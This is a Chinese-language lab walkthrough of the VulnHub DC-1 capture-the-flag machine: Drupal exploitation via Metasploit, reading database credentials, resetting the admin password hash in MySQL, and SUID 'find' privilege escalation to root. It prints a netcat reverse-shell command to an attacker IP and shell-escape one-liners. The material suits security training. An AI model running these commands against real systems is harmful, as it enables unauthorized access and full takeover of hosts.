vulnhub DC-1

思路：访问80端口看到drupalcms→利用已知漏洞获取shell→（可以直接提权）→当前目录获取flag1→根据提示获取flag2得到了数据库用户名密码→登录数据库获取用drupal户名密码→登录用户获取flag3→查看/etc/passwd发现flag4用户→在flag4用户目录下发现flag4.txt→find提权获取最后一个flag

arp-scan扫描获取ip

nmap扫描获取开放端口和服务信息

直接访问80端口，指纹识别为drupal的cms而且是7.X版本

直接在msf搜索对应的exp

使用第二个，配置好options

直接run，成功获取meterpreter

反弹shell,nc反弹成功

nc -e /bin/bash 192.168.101.59 4444

切换到交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看当前目录，有一个flag1.txt，让我们去查看配置文件

搜索配置文件位置

查看settings.php，获取到flag2和数据库密码

翻译一下，这里没有看懂

那既然获得了数据库账户密码，而且有shell，登录一下数据库看看

成功登录数据库

查看数据库内容获得了admin用户的密码

John破解一下试试，破解了半天暂时无过

突然想到既然获取shell了尝试尝试提权

find / -perm -u=s -type f 2>/dev/null

可以尝试find提权

尝试了一下失败，只能去搜索wp了

这时候突然john把密码破解了出来，但是发现是我上一次更改的

还是尝试用wp的方法改一下密码

这里尝试在password-hash.sh所在目录改 失败，在上一级目录更改才成功，不知道是啥原因。

进入mysql更改密码

update users set pass="$S$Dml2jK1Umg2ZOoE95rgSfzUBd8mTMJlMRP98bL5bCEDPQcgmbV81" where name="admin";

成功更改密码

进入主页登录这个用户

成功找到flag3，提示应该是find提权

查看/etc/passwd，看到一个flag4用户

查看/etc/shadow无权限

查看flag4.txt

直接find提权，获取root权限

find sassb -exec "/bin/sh" \;
find / -type f -name sassb -exec "/bin/sh" \;（2选1）
find / -type f -name sassb -exec "/bin/bash" \;（bash）不行

在root目录下获取flag